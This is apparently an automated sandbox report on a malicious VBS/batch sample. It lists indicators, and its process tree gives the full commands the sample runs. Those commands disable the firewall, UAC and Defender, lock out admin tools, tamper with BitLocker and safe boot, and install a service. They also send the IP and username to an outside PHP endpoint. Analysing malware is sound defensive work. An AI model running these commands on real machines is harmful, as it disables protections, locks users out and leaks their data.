Analysis
max time kernel: 72s
max time network: 79s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 15:03
Static task: static1
Behavioral task: behavioral1, sample malware.vbs, resource win7-20240221-en
Behavioral task: behavioral2, sample malware.vbs, resource win10v2004-20240508-en
General
Target: malware.vbs
Size: 6KB
MD5: 23878a8e1e67a80e987c44a81e7a886d
SHA1: 0330d6990bec48a65a1e359ebc1c9f51749e121d
SHA256: f1ad1ad54bbbb321cc210f44bc0c7d16f73a56f33964c9c0aa5f822c43302941
SHA512: c6948d90fb144a91f5d2b910314c04e91b0c3e22f6f9e8031ad3639803808420d7c80d35319ad1ac5e7adf810de019ec61434692f5a4bdff678bc39776f3189d
SSDEEP: 96:qDfYNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/MNa:qDfYqrZgX7yrCdPidfbU0a
Malware Config
Signatures
-
Processes:
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
- 5532 bcdedit.exe
- 5548 bcdedit.exe
- 5560 bcdedit.exe
- 5648 bcdedit.exe

Creates new service(s) 2 TTPs

Disables RegEdit via registry modification 1 IoCs
Processes:
- Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (reg.exe)

Disables Task Manager via registry modification

Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
- 5400 netsh.exe
- 5952 netsh.exe

Possible privilege escalation attempt 8 IoCs
Processes:
- 2192 icacls.exe
- 5388 takeown.exe
- 2900 icacls.exe
- 544 takeown.exe
- 5212 icacls.exe
- 5812 takeown.exe
- 5848 icacls.exe
- 2532 takeown.exe

Modifies file permissions 1 TTPs 8 IoCs
Processes:
- 5812 takeown.exe
- 5848 icacls.exe
- 2532 takeown.exe
- 2192 icacls.exe
- 5388 takeown.exe
- 2900 icacls.exe
- 544 takeown.exe
- 5212 icacls.exe

Drops file in System32 directory 21 IoCs
Processes (all by OpenWith.exe, all under C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\):
- File opened for modification iconcache_custom_stream.db
- File opened for modification iconcache_16.db
- File opened for modification iconcache_32.db
- File opened for modification iconcache_48.db
- File opened for modification iconcache_96.db
- File opened for modification iconcache_768.db
- File opened for modification iconcache_1280.db
- File opened for modification iconcache_2560.db
- File opened for modification iconcache_exif.db
- File opened for modification iconcache_idx.db
- File opened for modification iconcache_idx.db
- File opened for modification iconcache_32.db
- File opened for modification iconcache_sr.db
- File opened for modification iconcache_1920.db
- File opened for modification iconcache_wide.db
- File opened for modification iconcache_wide_alternate.db
- File opened for modification iconcache_32.db
- File opened for modification iconcache_idx.db
- File opened for modification iconcache_32.db
- File opened for modification iconcache_idx.db
- File opened for modification iconcache_256.db

Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
- 5564 sc.exe
- 5796 sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
- 5880 ipconfig.exe
- 5844 ipconfig.exe

Modifies data under HKEY_USERS 64 IoCs
Processes:
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software (reg.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\PreferredUILanguages = 720075002d005200550000000000 (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus" (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" (OpenWith.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" (LogonUI.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "137" (LogonUI.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000e2697c0c7ad8cd01 (cmd.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1" (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" (LogonUI.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached (reg.exe)
- Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings (OpenWith.exe)
- Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings (OpenWith.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 (LogonUI.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History (LogonUI.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached (cmd.exe)
- Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings (cmd.exe)
- Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings (OpenWith.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer (cmd.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" (cmd.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows (reg.exe)
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (cmd.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\International (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableGPO = "1" (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1" (reg.exe)
- Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings (OpenWith.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" (LogonUI.exe)
- Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached (reg.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ru-RU = "0419" (reg.exe)
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies (reg.exe)
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" (LogonUI.exe)
- Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\ (reg.exe)

Runs net.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes:
- Token: SeShutdownPrivilege (2996 powercfg.exe)
- Token: SeCreatePagefilePrivilege (2996 powercfg.exe)
- Token: SeShutdownPrivilege (412 powercfg.exe)
- Token: SeCreatePagefilePrivilege (412 powercfg.exe)
- Token: SeShutdownPrivilege (2824 powercfg.exe)
- Token: SeCreatePagefilePrivilege (2824 powercfg.exe)
- Token: SeShutdownPrivilege (4512 powercfg.exe)
- Token: SeCreatePagefilePrivilege (4512 powercfg.exe)
- Token: SeSystemtimePrivilege (4188 cmd.exe)
- Token: SeSystemtimePrivilege (4188 cmd.exe)
- Token: SeDebugPrivilege (5956 whoami.exe)
- Token: SeTakeOwnershipPrivilege (5388 takeown.exe)
- Token: SeShutdownPrivilege (5764 powercfg.exe)
- Token: SeCreatePagefilePrivilege (5764 powercfg.exe)
- Token: SeShutdownPrivilege (5808 powercfg.exe)
- Token: SeCreatePagefilePrivilege (5808 powercfg.exe)
- Token: SeShutdownPrivilege (5856 powercfg.exe)
- Token: SeCreatePagefilePrivilege (5856 powercfg.exe)
- Token: SeShutdownPrivilege (5868 powercfg.exe)
- Token: SeCreatePagefilePrivilege (5868 powercfg.exe)
- Token: SeDebugPrivilege (3152 whoami.exe)
- Token: SeTakeOwnershipPrivilege (544 takeown.exe)
- Token: SeTakeOwnershipPrivilege (5812 takeown.exe)
- Token: SeTakeOwnershipPrivilege (2532 takeown.exe)
- Token: SeShutdownPrivilege (4720 shutdown.exe)
- Token: SeRemoteShutdownPrivilege (4720 shutdown.exe)

Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
- 5704 OpenWith.exe
- 5892 OpenWith.exe
- 5124 OpenWith.exe
- 384 OpenWith.exe
- 2804 LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes (description, then source process -> target process):
- PID 4188 wrote to memory of 516 (4188 cmd.exe -> net.exe)
- PID 4188 wrote to memory of 516 (4188 cmd.exe -> net.exe)
- PID 516 wrote to memory of 5088 (516 net.exe -> net1.exe)
- PID 516 wrote to memory of 5088 (516 net.exe -> net1.exe)
- PID 4188 wrote to memory of 3672 (4188 cmd.exe -> msedge.exe)
- PID 4188 wrote to memory of 3672 (4188 cmd.exe -> msedge.exe)
- PID 4188 wrote to memory of 2996 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 2996 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 412 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 412 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 2824 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 2824 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 4512 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 4512 (4188 cmd.exe -> powercfg.exe)
- PID 4188 wrote to memory of 5400 (4188 cmd.exe -> netsh.exe)
- PID 4188 wrote to memory of 5400 (4188 cmd.exe -> netsh.exe)
- PID 4188 wrote to memory of 5444 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5444 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5464 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5464 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5480 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5480 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5496 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5496 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5512 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5512 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5528 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5528 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5544 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5544 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5560 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5560 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5576 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5576 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5592 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5592 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5608 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5608 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5624 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5624 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5640 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5640 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5656 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5656 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5672 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5672 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5688 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5688 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5704 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5704 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5720 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5720 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5736 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5736 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5752 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5752 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5768 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5768 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5784 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5784 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5800 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5800 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5816 (4188 cmd.exe -> reg.exe)
- PID 4188 wrote to memory of 5816 (4188 cmd.exe -> reg.exe)

Processes
(each entry gives the image path, then the command line; indented entries are children of the process above them, and signature hits follow as "- " items)

C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8

C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe
        net session
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=1234

    C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        - Modifies Windows Firewall

    C:\Windows\system32\reg.exe
        REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"

    C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop\MuiCached" /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop\MuiCache" /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        - UAC bypass

    C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

    C:\Windows\system32\reg.exe
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

    C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
        - Disables RegEdit via registry modification

    C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

        C:\Windows\system32\ipconfig.exe
            ipconfig
            - Gathers network information

        C:\Windows\system32\findstr.exe
            findstr IPv4

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.106

    C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c whoami

        C:\Windows\system32\whoami.exe
            whoami
            - Suspicious use of AdjustPrivilegeToken

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=13

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=gylqwjcn\admin

    C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c net user "Admin"

        C:\Windows\system32\net.exe
            net user "Admin"

            C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user "Admin"

    C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\notepad.exe"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
        - Possible privilege escalation attempt
        - Modifies file permissions

    C:\Windows\system32\manage-bde.exe
        manage-bde -off C:

    C:\Windows\system32\manage-bde.exe
        manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"

    C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled yes
        - Modifies boot configuration data using bcdedit

    C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit

    C:\Windows\system32\sc.exe
        sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
        - Launches sc.exe

    C:\Windows\system32\net.exe
        net start MiServicio

        C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start MiServicio

    C:\Windows\system32\takeown.exe
        takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe
        icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
        - Possible privilege escalation attempt
        - Modifies file permissions

    C:\Windows\system32\shutdown.exe
        shutdown /r /t 0
        - Suspicious use of AdjustPrivilegeToken

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=3984,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3992,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=4972,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5400,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5428,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5964,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
